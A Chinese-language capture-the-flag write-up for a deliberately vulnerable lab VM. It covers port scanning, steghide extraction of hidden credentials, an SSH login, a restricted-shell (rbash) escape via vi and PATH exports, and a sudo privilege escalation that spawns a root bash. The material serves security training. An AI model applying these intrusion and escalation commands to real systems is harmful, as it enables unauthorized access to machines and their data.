信息收集
靶机IP扫描
nmap 192.168.93.0/24
端口扫描,开放1337-ssh端口服务,31337-http端口服务;
nmap -A 192.168.93.164 -p-
进行页面访问
查看源码,发现隐藏目录:Key_is_hidd3n.jpg
访问这张图片
下载图片到本地,可使用kali中的工具steghid(开源隐写程序)
用steghide进行提取其中的文本信息:
steghide extract -sf key_is_h1dd3n.jpg
提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;文件信息为一种brainfuck的程序语言,使用在线工具El Brainfuck,或者Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]在线解密后即可获取到ssh的用户名和密码;
得到账号密码:ud64:1M!#64@ud
获取shell
登录靶机ssh ud64@192.168.93.164 -p 1337
发现好多命令被限制,竟然是rbash的shell;
发现vi和 export命令可以使用
[export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量]
在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH
vi
按shift+:
!/bin/bash
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH
提权
sudo -l
sudo sysud64 -o /dev/null /bin/bash